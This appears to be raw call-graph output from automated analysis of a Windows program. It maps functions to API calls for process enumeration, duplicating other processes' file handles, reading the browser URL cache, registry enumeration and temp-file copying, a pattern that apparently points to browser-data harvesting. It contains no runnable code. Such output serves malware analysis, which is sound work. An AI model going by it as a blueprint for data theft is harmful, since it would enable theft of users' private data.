39274 444972 GetVersionExW 38625->39274 38627->38622 38628 444b99 memcmp 38633 444b8c 38628->38633 38629 444c0b 39278 444a85 42 API calls 38629->39278 38633->38628 38633->38629 39275 444aa5 42 API calls 38633->39275 39276 40a7a0 GetVersionExW 38633->39276 39277 444a85 42 API calls 38633->39277 38636 40399d 38635->38636 39279 403a16 38636->39279 38638 403a09 39293 40b1ab ??3@YAXPAX ??3@YAXPAX 38638->39293 38640 403a12 wcsrchr 38640->38369 38641 4039a3 38641->38638 38644 4039f4 38641->38644 39290 40a02c CreateFileW 38641->39290 38644->38638 38645 4099c6 2 API calls 38644->38645 38645->38638 38647 414c2e 16 API calls 38646->38647 38648 404048 38647->38648 38649 414c2e 16 API calls 38648->38649 38650 404056 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 404073 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40408e 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4040a6 38655->38656 38657 403af5 20 API calls 38656->38657 38658 4040ba 38657->38658 38659 403af5 20 API calls 38658->38659 38660 4040cb 38659->38660 39320 40414f memset 38660->39320 38662 404140 39334 40b1ab ??3@YAXPAX ??3@YAXPAX 38662->39334 38664 4040ec memset 38667 4040e0 38664->38667 38665 404148 38665->38429 38666 4099c6 2 API calls 38666->38667 38667->38662 38667->38664 38667->38666 38668 40a8ab 9 API calls 38667->38668 38668->38667 39347 40a6e6 WideCharToMultiByte 38669->39347 38671 4087ed 39348 4095d9 memset 38671->39348 38674 408953 38674->38429 38675 408809 memset memset memset memset memset 38676 40b2cc 27 API calls 38675->38676 38677 4088a1 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 4088b1 38678->38679 38680 40b2cc 27 API calls 38679->38680 38681 4088c0 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 4088d0 38682->38683 38684 40b2cc 27 API calls 38683->38684 38685 4088df 38684->38685 38686 409d1f 6 API calls 38685->38686 38687 4088ef 38686->38687 38688 40b2cc 27 API calls 38687->38688 38689 4088fe 38688->38689 38690 409d1f 6 API calls 38689->38690 38691 40890e 38690->38691 38692 40b2cc 27 API calls 38691->38692 38693 40891d 38692->38693 38694 409d1f 6 API calls 38693->38694 38695 40892d 38694->38695 39367 409b98 GetFileAttributesW 38695->39367 38697 40893e 38698 408943 38697->38698 38699 408958 38697->38699 38721 40b633 ??3@YAXPAX 38720->38721 38722 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38721->38722 38723 413f00 Process32NextW 38722->38723 38724 413da5 OpenProcess 38723->38724 38725 413f17 CloseHandle 38723->38725 38726 413df3 memset 38724->38726 38729 413eb0 38724->38729 38725->38466 39683 413f27 38726->39683 38728 413ebf ??3@YAXPAX 38728->38729 38729->38723 38729->38728 38730 4099f4 3 API calls 38729->38730 38730->38729 38732 413e37 GetModuleHandleW 38733 413e46 GetProcAddress 38732->38733 38734 413e1f 38732->38734 38733->38734 38734->38732 39688 413959 38734->39688 39704 413ca4 38734->39704 38736 413ea2 CloseHandle 38736->38729 38738 414c2e 16 API calls 38737->38738 38739 403eb7 38738->38739 38740 414c2e 16 API calls 38739->38740 38741 403ec5 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403ee2 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403efd 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403f15 38746->38747 38748 403af5 20 API calls 38747->38748 38749 403f29 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403f3a 38750->38751 38752 40414f 33 API calls 38751->38752 38757 403f4f 38752->38757 38753 403faf 39718 40b1ab ??3@YAXPAX ??3@YAXPAX 38753->39718 38755 403f5b memset 38755->38757 38756 403fb7 38756->38412 38757->38753 38757->38755 38758 4099c6 2 API calls 38757->38758 38759 40a8ab 9 API calls 38757->38759 38758->38757 38759->38757 38761 414c2e 16 API calls 38760->38761 38762 403d26 38761->38762 38763 414c2e 16 API calls 38762->38763 38764 403d34 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 403d51 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403d6c 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403d84 38769->38770 38771 403af5 20 API calls 38770->38771 38772 403d98 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403da9 38773->38774 38775 40414f 33 API calls 38774->38775 38776 403dbe 38775->38776 38777 403e1e 38776->38777 38778 403dca memset 38776->38778 38781 4099c6 2 API calls 38776->38781 38782 40a8ab 9 API calls 38776->38782 39719 40b1ab ??3@YAXPAX ??3@YAXPAX 38777->39719 38778->38776 38780 403e26 38780->38416 38781->38776 38782->38776 38784 414b81 9 API calls 38783->38784 38785 414c40 38784->38785 38786 414c73 memset 38785->38786 39720 409cea 38785->39720 38788 414c94 38786->38788 39723 414592 RegOpenKeyExW 38788->39723 38790 414c64 38790->38407 38792 414cc1 38793 414cf4 wcscpy 38792->38793 39724 414bb0 wcscpy 38792->39724 38793->38790 38795 414cd2 39725 4145ac RegQueryValueExW 38795->39725 38797 414ce9 RegCloseKey 38797->38793 38799 409d62 38798->38799 38800 409d43 wcscpy 38798->38800 38799->38440 38801 409719 2 API calls 38800->38801 38802 409d51 wcscat 38801->38802 38802->38799 38804 40aebe FindClose 38803->38804 38805 40ae21 38804->38805 38806 4099c6 2 API calls 38805->38806 38807 40ae35 38806->38807 38808 409d1f 6 API calls 38807->38808 38809 40ae49 38808->38809 38809->38483 38811 40ade0 38810->38811 38812 40ae0f 38810->38812 38811->38812 38813 40ade7 wcscmp 38811->38813 38812->38483 38813->38812 38814 40adfe wcscmp 38813->38814 38814->38812 38816 40ae18 9 API calls 38815->38816 38818 4453c4 38816->38818 38817 40ae51 9 API calls 38817->38818 38818->38817 38819 4453f3 38818->38819 38820 40add4 2 API calls 38818->38820 38823 445403 253 API calls 38818->38823 38821 40aebe FindClose 38819->38821 38820->38818 38822 4453fe 38821->38822 38822->38483 38823->38818 38825 40ae7b FindNextFileW 38824->38825 38826 40ae5c FindFirstFileW 38824->38826 38827 40ae94 38825->38827 38828 40ae8f 38825->38828 38826->38827 38830 40aeb6 38827->38830 38831 409d1f 6 API calls 38827->38831 38829 40aebe FindClose 38828->38829 38829->38827 38830->38483 38831->38830 38832->38415 38833->38469 38834->38450 38835->38450 38836->38484 38838 409c89 38837->38838 38838->38506 38839->38536 38841 413d39 38840->38841 38842 413d2f FreeLibrary 38840->38842 38843 40b633 ??3@YAXPAX 38841->38843 38842->38841 38844 413d42 38843->38844 38845 40b633 ??3@YAXPAX 38844->38845 38846 413d4a 38845->38846 38846->38364 38847->38367 38848->38418 38849->38432 38851 44db70 38850->38851 38852 40b6fc memset 38851->38852 38853 409c70 2 API calls 38852->38853 38854 40b732 wcsrchr 38853->38854 38855 40b743 38854->38855 38856 40b746 memset 38854->38856 38855->38856 38857 40b2cc 27 API calls 38856->38857 38858 40b76f 38857->38858 38859 409d1f 6 API calls 38858->38859 38860 40b783 38859->38860 39726 409b98 GetFileAttributesW 38860->39726 38862 40b792 38863 40b7c2 38862->38863 38864 409c70 2 API calls 38862->38864 39727 40bb98 38863->39727 38866 40b7a5 38864->38866 38868 40b2cc 27 API calls 38866->38868 38872 40b7b2 38868->38872 38869 40b837 FindCloseChangeNotification 38871 40b83e memset 38869->38871 38870 40b817 39779 409a45 GetTempPathW 38870->39779 39760 40a6e6 WideCharToMultiByte 38871->39760 38875 409d1f 6 API calls 38872->38875 38875->38863 38876 40b827 CopyFileW 38876->38871 38877 40b866 38878 444432 121 API calls 38877->38878 38879 40b879 38878->38879 38880 40bad5 38879->38880 38881 40b273 27 API calls 38879->38881 38882 40baeb 38880->38882 38883 40bade DeleteFileW 38880->38883 38884 40b89a 38881->38884 38885 40b04b ??3@YAXPAX 38882->38885 38883->38882 38886 438552 134 API calls 38884->38886 38887 40baf3 38885->38887 38888 40b8a4 38886->38888 38887->38443 38889 40bacd 38888->38889 38891 4251c4 137 API calls 38888->38891 38890 443d90 111 API calls 38889->38890 38890->38880 38914 40b8b8 38891->38914 38892 40bac6 39786 424f26 123 API calls 38892->39786 38893 40b8bd memset 39761 425413 38893->39761 38896 425413 17 API calls 38896->38914 38899 40a71b MultiByteToWideChar 38899->38914 38900 40a734 MultiByteToWideChar 38900->38914 38901 4253af 17 API calls 38901->38914 38902 4253cf 17 API calls 38902->38914 38903 40b9b5 memcmp 38903->38914 38904 4099c6 2 API calls 38904->38914 38905 404423 37 API calls 38905->38914 38908 40bb3e memset memcpy 39787 40a734 MultiByteToWideChar 38908->39787 38909 4251c4 137 API calls 38909->38914 38911 40bb88 LocalFree 38911->38914 38914->38892 38914->38893 38914->38896 38914->38899 38914->38900 38914->38901 38914->38902 38914->38903 38914->38904 38914->38905 38914->38908 38914->38909 38915 40ba5f memcmp 38914->38915 38916 4099f4 3 API calls 38914->38916 39768 4253ef 38914->39768 39773 40b64c 38914->39773 39782 447280 memset 38914->39782 39783 447960 memset memcpy memcpy memcpy 38914->39783 39784 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38914->39784 39785 447920 memcpy memcpy memcpy 38914->39785 38915->38914 38916->38914 38917->38445 38919 40aed1 38918->38919 38920 40aec7 FindClose 38918->38920 38919->38377 38920->38919 38922 4099d7 38921->38922 38923 4099da memcpy 38921->38923 38922->38923 38923->38428 38925 40b2cc 27 API calls 38924->38925 38926 44543f 38925->38926 38927 409d1f 6 API calls 38926->38927 38928 44544f 38927->38928 39880 409b98 GetFileAttributesW 38928->39880 38930 44545e 38931 445476 38930->38931 38932 40b6ef 252 API calls 38930->38932 38933 40b2cc 27 API calls 38931->38933 38932->38931 38934 445482 38933->38934 38935 409d1f 6 API calls 38934->38935 38936 445492 38935->38936 39881 409b98 GetFileAttributesW 38936->39881 38938 4454a1 38939 4454b9 38938->38939 38940 40b6ef 252 API calls 38938->38940 38939->38458 38940->38939 38941->38457 38942->38474 38943->38480 38944->38517 38945->38495 38946->38544 38947->38544 38948->38527 38949->38555 38950->38557 38951->38559 38953 414c2e 16 API calls 38952->38953 38954 40c2ae 38953->38954 39024 40c1d3 38954->39024 38959 40c3be 38976 40a8ab 38959->38976 38960 40afcf 2 API calls 38961 40c2fd FindFirstUrlCacheEntryW 38960->38961 38962 40c3b6 38961->38962 38963 40c31e wcschr 38961->38963 38964 40b04b ??3@YAXPAX 38962->38964 38965 40c331 38963->38965 38966 40c35e FindNextUrlCacheEntryW 38963->38966 38964->38959 38967 40a8ab 9 API calls 38965->38967 38966->38963 38968 40c373 GetLastError 38966->38968 38971 40c33e wcschr 38967->38971 38969 40c3ad FindCloseUrlCache 38968->38969 38970 40c37e 38968->38970 38969->38962 38972 40afcf 2 API calls 38970->38972 38971->38966 38973 40c34f 38971->38973 38974 40c391 FindNextUrlCacheEntryW 38972->38974 38975 40a8ab 9 API calls 38973->38975 38974->38963 38974->38969 38975->38966 39140 40a97a 38976->39140 38979 40a8cc 38979->38566 38980 40a8d0 7 API calls 38980->38979 39145 40b1ab ??3@YAXPAX ??3@YAXPAX 38981->39145 38983 40c3dd 38984 40b2cc 27 API calls 38983->38984 38985 40c3e7 38984->38985 39146 414592 RegOpenKeyExW 38985->39146 38987 40c3f4 38988 40c50e 38987->38988 38989 40c3ff 38987->38989 39003 405337 38988->39003 38990 40a9ce 4 API calls 38989->38990 38991 40c418 memset 38990->38991 39147 40aa1d 38991->39147 38994 40c471 38996 40c47a _wcsupr 38994->38996 38995 40c505 RegCloseKey 38995->38988 38997 40a8d0 7 API calls 38996->38997 38998 40c498 38997->38998 38999 40a8d0 7 API calls 38998->38999 39000 40c4ac memset 38999->39000 39001 40aa1d 39000->39001 39002 40c4e4 RegEnumValueW 39001->39002 39002->38995 39002->38996 39149 405220 39003->39149 39007 4099c6 2 API calls 39006->39007 39008 40a714 _wcslwr 39007->39008 39009 40c634 39008->39009 39206 405361 39009->39206 39012 40c65c wcslen 39209 4053b6 39 API calls 39012->39209 39013 40c71d wcslen 39013->38573 39015 40c677 39016 40c713 39015->39016 39210 40538b 39 API calls 39015->39210 39212 4053df 39 API calls 39016->39212 39019 40c6a5 39019->39016 39020 40c6a9 memset 39019->39020 39021 40c6d3 39020->39021 39211 40c589 43 API calls 39021->39211 39023->38574 39025 40ae18 9 API calls 39024->39025 39031 40c210 39025->39031 39026 40ae51 9 API calls 39026->39031 39027 40c264 39028 40aebe FindClose 39027->39028 39030 40c26f 39028->39030 39029 40add4 2 API calls 39029->39031 39036 40e5ed memset memset 39030->39036 39031->39026 39031->39027 39031->39029 39032 40c231 _wcsicmp 39031->39032 39033 40c1d3 35 API calls 39031->39033 39032->39031 39034 40c248 39032->39034 39033->39031 39049 40c084 22 API calls 39034->39049 39037 414c2e 16 API calls 39036->39037 39038 40e63f 39037->39038 39039 409d1f 6 API calls 39038->39039 39040 40e658 39039->39040 39050 409b98 GetFileAttributesW 39040->39050 39042 40e667 39043 409d1f 6 API calls 39042->39043 39045 40e680 39042->39045 39043->39045 39051 409b98 GetFileAttributesW 39045->39051 39046 40e68f 39047 40c2d8 39046->39047 39052 40e4b2 39046->39052 39047->38959 39047->38960 39049->39031 39050->39042 39051->39046 39073 40e01e 39052->39073 39054 40e593 39055 40e5b0 39054->39055 39056 40e59c DeleteFileW 39054->39056 39057 40b04b ??3@YAXPAX 39055->39057 39056->39055 39059 40e5bb 39057->39059 39058 40e521 39058->39054 39096 40e175 39058->39096 39061 40e5c4 CloseHandle 39059->39061 39062 40e5cc 39059->39062 39061->39062 39064 40b633 ??3@YAXPAX 39062->39064 39063 40e573 39065 40e584 39063->39065 39066 40e57c FindCloseChangeNotification 39063->39066 39067 40e5db 39064->39067 39139 40b1ab ??3@YAXPAX ??3@YAXPAX 39065->39139 39066->39065 39070 40b633 ??3@YAXPAX 39067->39070 39069 40e540 39069->39063 39116 40e2ab 39069->39116 39071 40e5e3 39070->39071 39071->39047 39074 406214 22 API calls 39073->39074 39075 40e03c 39074->39075 39076 40e16b 39075->39076 39077 40dd85 74 API calls 39075->39077 39076->39058 39078 40e06b 39077->39078 39078->39076 39079 40afcf ??2@YAPAXI ??3@YAXPAX 39078->39079 39080 40e08d OpenProcess 39079->39080 39081 40e0a4 GetCurrentProcess DuplicateHandle 39080->39081 39085 40e152 39080->39085 39082 40e0d0 GetFileSize 39081->39082 39083 40e14a CloseHandle 39081->39083 39086 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39082->39086 39083->39085 39084 40e160 39088 40b04b ??3@YAXPAX 39084->39088 39085->39084 39087 406214 22 API calls 39085->39087 39089 40e0ea 39086->39089 39087->39084 39088->39076 39090 4096dc CreateFileW 39089->39090 39091 40e0f1 CreateFileMappingW 39090->39091 39092 40e140 CloseHandle CloseHandle 39091->39092 39093 40e10b MapViewOfFile 39091->39093 39092->39083 39094 40e13b FindCloseChangeNotification 39093->39094 39095 40e11f WriteFile UnmapViewOfFile 39093->39095 39094->39092 39095->39094 39097 40e18c 39096->39097 39098 406b90 11 API calls 39097->39098 39099 40e19f 39098->39099 39100 40e1a7 memset 39099->39100 39101 40e299 39099->39101 39106 40e1e8 39100->39106 39102 4069a3 ??3@YAXPAX ??3@YAXPAX 39101->39102 39103 40e2a4 39102->39103 39103->39069 39104 406e8f 13 API calls 39104->39106 39105 406b53 SetFilePointerEx ReadFile 39105->39106 39106->39104 39106->39105 39107 40e283 39106->39107 39108 40dd50 _wcsicmp 39106->39108 39112 40742e 8 API calls 39106->39112 39113 40aae3 wcslen wcslen _memicmp 39106->39113 39114 40e244 _snwprintf 39106->39114 39109 40e291 39107->39109 39110 40e288 ??3@YAXPAX 39107->39110 39108->39106 39111 40aa04 ??3@YAXPAX 39109->39111 39110->39109 39111->39101 39112->39106 39113->39106 39115 40a8d0 7 API calls 39114->39115 39115->39106 39117 40e2c2 39116->39117 39118 406b90 11 API calls 39117->39118 39129 40e2d3 39118->39129 39119 40e4a0 39120 4069a3 ??3@YAXPAX ??3@YAXPAX 39119->39120 39122 40e4ab 39120->39122 39121 406e8f 13 API calls 39121->39129 39122->39069 39123 406b53 SetFilePointerEx ReadFile 39123->39129 39124 40e489 39125 40aa04 ??3@YAXPAX 39124->39125 39127 40e491 39125->39127 39126 40dd50 _wcsicmp 39126->39129 39127->39119 39128 40e497 ??3@YAXPAX 39127->39128 39128->39119 39129->39119 39129->39121 39129->39123 39129->39124 39129->39126 39130 40dd50 _wcsicmp 39129->39130 39133 40742e 8 API calls 39129->39133 39134 40e3e0 memcpy 39129->39134 39135 40e3b3 wcschr 39129->39135 39136 40e3fb memcpy 39129->39136 39137 40e416 memcpy 39129->39137 39138 40e431 memcpy 39129->39138 39131 40e376 memset 39130->39131 39132 40aa29 6 API calls 39131->39132 39132->39129 39133->39129 39134->39129 39135->39129 39136->39129 39137->39129 39138->39129 39139->39054 39142 40a980 39140->39142 39141 40a8bb 39141->38979 39141->38980 39142->39141 39143 40a995 _wcsicmp 39142->39143 39144 40a99c wcscmp 39142->39144 39143->39142 39144->39142 39145->38983 39146->38987 39148 40aa23 RegEnumValueW 39147->39148 39148->38994 39148->38995 39150 405335 39149->39150 39151 40522a 39149->39151 39150->38573 39152 40b2cc 27 API calls 39151->39152 39153 405234 39152->39153 39154 40a804 8 API calls 39153->39154 39155 40523a 39154->39155 39194 40b273 39155->39194 39157 405248 _mbscpy _mbscat GetProcAddress 39158 40b273 27 API calls 39157->39158 39159 405279 39158->39159 39197 405211 GetProcAddress 39159->39197 39161 405282 39162 40b273 27 API calls 39161->39162 39163 40528f 39162->39163 39198 405211 GetProcAddress 39163->39198 39165 405298 39166 40b273 27 API calls 39165->39166 39167 4052a5 39166->39167 39199 405211 GetProcAddress 39167->39199 39169 4052ae 39170 40b273 27 API calls 39169->39170 39171 4052bb 39170->39171 39200 405211 GetProcAddress 39171->39200 39173 4052c4 39174 40b273 27 API calls 39173->39174 39175 4052d1 39174->39175 39201 405211 GetProcAddress 39175->39201 39177 4052da 39178 40b273 27 API calls 39177->39178 39179 4052e7 39178->39179 39202 405211 GetProcAddress 39179->39202 39181 4052f0 39182 40b273 27 API calls 39181->39182 39183 4052fd 39182->39183 39203 405211 GetProcAddress 39183->39203 39185 405306 39186 40b273 27 API calls 39185->39186 39187 405313 39186->39187 39204 405211 GetProcAddress 39187->39204 39189 40531c 39190 40b273 27 API calls 39189->39190 39191 405329 39190->39191 39205 405211 GetProcAddress 39191->39205 39193 405332 39193->39150 39195 40b58d 27 API calls 39194->39195 39196 40b18c 39195->39196 39196->39157 39197->39161 39198->39165 39199->39169 39200->39173 39201->39177 39202->39181 39203->39185 39204->39189 39205->39193 39207 405220 39 API calls 39206->39207 39208 405369 39207->39208 39208->39012 39208->39013 39209->39015 39210->39019 39211->39016 39212->39013 39214 40440c FreeLibrary 39213->39214 39215 40436d 39214->39215 39216 40a804 8 API calls 39215->39216 39217 404377 39216->39217 39218 404383 39217->39218 39219 404405 39217->39219 39220 40b273 27 API calls 39218->39220 39219->38585 39219->38587 39219->38588 39221 40438d GetProcAddress 39220->39221 39222 40b273 27 API calls 39221->39222 39223 4043a7 GetProcAddress 39222->39223 39224 40b273 27 API calls 39223->39224 39225 4043ba GetProcAddress 39224->39225 39226 40b273 27 API calls 39225->39226 39227 4043ce GetProcAddress 39226->39227 39228 40b273 27 API calls 39227->39228 39229 4043e2 GetProcAddress 39228->39229 39230 4043f1 39229->39230 39231 4043f7 39230->39231 39232 40440c FreeLibrary 39230->39232 39231->39219 39232->39219 39234 404413 FreeLibrary 39233->39234 39235 40441e 39233->39235 39234->39235 39235->38602 39236->38592 39238 40447e 39237->39238 39239 40442e 39237->39239 39238->38592 39240 40b2cc 27 API calls 39239->39240 39241 404438 39240->39241 39242 40a804 8 API calls 39241->39242 39243 40443e 39242->39243 39244 404445 39243->39244 39245 404467 39243->39245 39246 40b273 27 API calls 39244->39246 39245->39238 39247 404475 FreeLibrary 39245->39247 39248 40444f GetProcAddress 39246->39248 39247->39238 39248->39245 39249 404460 39248->39249 39249->39245 39251 4135f6 39250->39251 39252 4135eb FreeLibrary 39250->39252 39251->38605 39252->39251 39254 4449c4 39253->39254 39255 444a52 39253->39255 39256 40b2cc 27 API calls 39254->39256 39255->38622 39255->38623 39257 4449cb 39256->39257 39258 40a804 8 API calls 39257->39258 39259 4449d1 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4449dc GetProcAddress 39260->39261 39262 40b273 27 API calls 39261->39262 39263 4449f3 GetProcAddress 39262->39263 39264 40b273 27 API calls 39263->39264 39265 444a04 GetProcAddress 39264->39265 39266 40b273 27 API calls 39265->39266 39267 444a15 GetProcAddress 39266->39267 39268 40b273 27 API calls 39267->39268 39269 444a26 GetProcAddress 39268->39269 39270 40b273 27 API calls 39269->39270 39271 444a37 GetProcAddress 39270->39271 39272 40b273 27 API calls 39271->39272 39273 444a48 GetProcAddress 39272->39273 39273->39255 39274->38633 39275->38633 39276->38633 39277->38633 39278->38624 39280 403a29 39279->39280 39294 403bed memset memset 39280->39294 39282 403ae7 39307 40b1ab ??3@YAXPAX ??3@YAXPAX 39282->39307 39283 403a3f memset 39288 403a2f 39283->39288 39285 403aef 39285->38641 39286 409d1f 6 API calls 39286->39288 39287 409b98 GetFileAttributesW 39287->39288 39288->39282 39288->39283 39288->39286 39288->39287 39289 40a8d0 7 API calls 39288->39289 39289->39288 39291 40a051 GetFileTime FindCloseChangeNotification 39290->39291 39292 4039ca CompareFileTime 39290->39292 39291->39292 39292->38641 39293->38640 39295 414c2e 16 API calls 39294->39295 39296 403c38 39295->39296 39297 409719 2 API calls 39296->39297 39298 403c3f wcscat 39297->39298 39299 414c2e 16 API calls 39298->39299 39300 403c61 39299->39300 39301 409719 2 API calls 39300->39301 39302 403c68 wcscat 39301->39302 39308 403af5 39302->39308 39305 403af5 20 API calls 39306 403c95 39305->39306 39306->39288 39307->39285 39309 403b02 39308->39309 39310 40ae18 9 API calls 39309->39310 39318 403b37 39310->39318 39311 403bdb 39313 40aebe FindClose 39311->39313 39312 40add4 wcscmp wcscmp 39312->39318 39314 403be6 39313->39314 39314->39305 39315 40ae18 9 API calls 39315->39318 39316 40ae51 9 API calls 39316->39318 39317 40aebe FindClose 39317->39318 39318->39311 39318->39312 39318->39315 39318->39316 39318->39317 39319 40a8d0 7 API calls 39318->39319 39319->39318 39321 409d1f 6 API calls 39320->39321 39322 404190 39321->39322 39335 409b98 GetFileAttributesW 39322->39335 39324 40419c 39325 4041a7 6 API calls 39324->39325 39326 40435c 39324->39326 39327 40424f 39325->39327 39326->38667 39327->39326 39329 40425e memset 39327->39329 39331 409d1f 6 API calls 39327->39331 39332 40a8ab 9 API calls 39327->39332 39336 414842 39327->39336 39329->39327 39330 404296 wcscpy 39329->39330 39330->39327 39331->39327 39333 4042b6 memset memset _snwprintf wcscpy 39332->39333 39333->39327 39334->38665 39335->39324 39339 41443e 39336->39339 39338 414866 39338->39327 39340 41444b 39339->39340 39341 414451 39340->39341 39342 4144a3 GetPrivateProfileStringW 39340->39342 39343 414491 39341->39343 39344 414455 wcschr 39341->39344 39342->39338 39346 414495 WritePrivateProfileStringW 39343->39346 39344->39343 39345 414463 _snwprintf 39344->39345 39345->39346 39346->39338 39347->38671 39349 40b2cc 27 API calls 39348->39349 39350 409615 39349->39350 39351 409d1f 6 API calls 39350->39351 39352 409625 39351->39352 39377 409b98 GetFileAttributesW 39352->39377 39354 409634 39355 409648 39354->39355 39378 4091b8 memset 39354->39378 39357 40b2cc 27 API calls 39355->39357 39359 408801 39355->39359 39358 40965d 39357->39358 39360 409d1f 6 API calls 39358->39360 39359->38674 39359->38675 39361 40966d 39360->39361 39430 409b98 GetFileAttributesW 39361->39430 39363 40967c 39363->39359 39364 409681 39363->39364 39431 409529 72 API calls 39364->39431 39366 409690 39366->39359 39367->38697 39377->39354 39432 40a6e6 WideCharToMultiByte 39378->39432 39380 409202 39433 444432 39380->39433 39383 40b273 27 API calls 39384 409236 39383->39384 39479 438552 39384->39479 39387 409383 39389 40b273 27 API calls 39387->39389 39391 409399 39389->39391 39393 438552 134 API calls 39391->39393 39411 4093a3 39393->39411 39397 4094ff 39482 443d90 39397->39482 39400 4251c4 137 API calls 39400->39411 39402 409507 39410 40951d 39402->39410 39404 4093df 39535 424f26 123 API calls 39404->39535 39408 4253cf 17 API calls 39408->39411 39410->39355 39411->39397 39411->39400 39411->39404 39411->39408 39413 4093e4 39411->39413 39417 4253af 17 API calls 39413->39417 39420 4093ed 39417->39420 39422 4253af 17 API calls 39420->39422 39430->39363 39431->39366 39432->39380 39434 4438b5 11 API calls 39433->39434 39435 44444c 39434->39435 39441 409215 39435->39441 39537 415a6d 39435->39537 39437 4442e6 11 API calls 39439 44469e 39437->39439 39438 444486 39440 4444b9 memcpy 39438->39440 39478 4444a4 39438->39478 39439->39441 39443 443d90 111 API calls 39439->39443 39541 415258 39440->39541 39441->39383 39441->39410 39443->39441 39444 444524 39445 444541 39444->39445 39446 44452a 39444->39446 39544 444316 39445->39544 39447 416935 16 API calls 39446->39447 39447->39478 39450 444316 18 API calls 39451 444563 39450->39451 39452 444316 18 API calls 39451->39452 39453 44456f 39452->39453 39454 444316 18 API calls 39453->39454 39478->39437 39611 438460 39479->39611 39481 409240 39481->39387 39502 4251c4 39481->39502 39483 443da3 39482->39483 39484 443db6 39482->39484 39623 41707a 39483->39623 39484->39402 39639 424f07 39502->39639 39504 4251e4 39505 4251f7 39504->39505 39506 4251e8 39504->39506 39647 4250f8 39505->39647 39646 4446ea 11 API calls 39506->39646 39508 4251f2 39535->39397 39538 415a77 39537->39538 39539 415a8d 39538->39539 39540 415a7e memset 39538->39540 39539->39438 39540->39539 39542 4438b5 11 API calls 39541->39542 39543 41525d 39542->39543 39543->39444 39545 444328 39544->39545 39546 444423 39545->39546 39547 44434e 39545->39547 39549 4446ea 11 API calls 39546->39549 39548 432d4e memset memset memcpy 39547->39548 39550 44435a 39548->39550 39555 444381 39549->39555 39552 444375 39550->39552 39557 44438b 39550->39557 39551 432d4e memset memset memcpy 39553 4443ec 39551->39553 39554 416935 16 API calls 39552->39554 39553->39555 39556 416935 16 API calls 39553->39556 39554->39555 39555->39450 39556->39555 39557->39551 39612 41703f 11 API calls 39611->39612 39613 43847a 39612->39613 39614 43848a 39613->39614 39615 43847e 39613->39615 39617 438270 134 API calls 39614->39617 39616 4446ea 11 API calls 39615->39616 39619 438488 39616->39619 39618 4384aa 39617->39618 39618->39619 39620 424f26 123 API calls 39618->39620 39619->39481 39621 4384bb 39620->39621 39622 438270 134 API calls 39621->39622 39622->39619 39640 424f1f 39639->39640 39641 424f0c 39639->39641 39643 424eea 11 API calls 39640->39643 39642 416760 11 API calls 39641->39642 39644 424f18 39642->39644 39645 424f24 39643->39645 39644->39504 39645->39504 39646->39508 39710 413f4f 39683->39710 39686 413f37 K32GetModuleFileNameExW 39687 413f4a 39686->39687 39687->38734 39689 413969 wcscpy 39688->39689 39690 41396c wcschr 39688->39690 39702 413a3a 39689->39702 39690->39689 39692 41398e 39690->39692 39715 4097f7 wcslen wcslen _memicmp 39692->39715 39694 41399a 39695 4139a4 memset 39694->39695 39696 4139e6 39694->39696 39716 409dd5 GetWindowsDirectoryW wcscpy 39695->39716 39698 413a31 wcscpy 39696->39698 39699 4139ec memset 39696->39699 39698->39702 39717 409dd5 GetWindowsDirectoryW wcscpy 39699->39717 39700 4139c9 wcscpy wcscat 39700->39702 39702->38734 39703 413a11 memcpy wcscat 39703->39702 39705 413cb0 GetModuleHandleW 39704->39705 39706 413cda 39704->39706 39705->39706 39707 413cbf GetProcAddress 39705->39707 39708 413ce3 GetProcessTimes 39706->39708 39709 413cf6 39706->39709 39707->39706 39708->38736 39709->38736 39711 413f2f 39710->39711 39712 413f54 39710->39712 39711->39686 39711->39687 39713 40a804 8 API calls 39712->39713 39714 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39713->39714 39714->39711 39715->39694 39716->39700 39717->39703 39718->38756 39719->38780 39721 409cf9 GetVersionExW 39720->39721 39722 409d0a 39720->39722 39721->39722 39722->38786 39722->38790 39723->38792 39724->38795 39725->38797 39726->38862 39728 40bba5 39727->39728 39788 40cc26 39728->39788 39731 40bd4b 39809 40cc0c 39731->39809 39736 40b2cc 27 API calls 39737 40bbef 39736->39737 39816 40ccf0 _wcsicmp 39737->39816 39739 40bbf5 39739->39731 39817 40ccb4 6 API calls 39739->39817 39741 40bc26 39742 40cf04 17 API calls 39741->39742 39743 40bc2e 39742->39743 39744 40bd43 39743->39744 39745 40b2cc 27 API calls 39743->39745 39746 40cc0c 4 API calls 39744->39746 39747 40bc40 39745->39747 39746->39731 39818 40ccf0 _wcsicmp 39747->39818 39749 40bc46 39749->39744 39750 40bc61 memset memset WideCharToMultiByte 39749->39750 39819 40103c strlen 39750->39819 39752 40bcc0 39753 40b273 27 API calls 39752->39753 39754 40bcd0 memcmp 39753->39754 39754->39744 39755 40bce2 39754->39755 39756 404423 37 API calls 39755->39756 39757 40bd10 39756->39757 39757->39744 39758 40bd3a LocalFree 39757->39758 39759 40bd1f memcpy 39757->39759 39758->39744 39759->39758 39760->38877 39762 42533e 16 API calls 39761->39762 39763 42541f 39762->39763 39764 424ff0 13 API calls 39763->39764 39765 425425 39764->39765 39766 42538f 16 API calls 39765->39766 39767 42542d 39766->39767 39767->38914 39769 42533e 16 API calls 39768->39769 39770 4253fb 39769->39770 39771 42538f 16 API calls 39770->39771 39772 42540b 39771->39772 39772->38914 39774 40b65c 39773->39774 39775 40b697 SystemTimeToFileTime 39774->39775 39778 40b681 39774->39778 39879 44d9c0 39775->39879 39777 40b6d6 FileTimeToLocalFileTime 39777->39778 39778->38914 39780 409a74 GetTempFileNameW 39779->39780 39781 409a66 GetWindowsDirectoryW 39779->39781 39780->38876 39781->39780 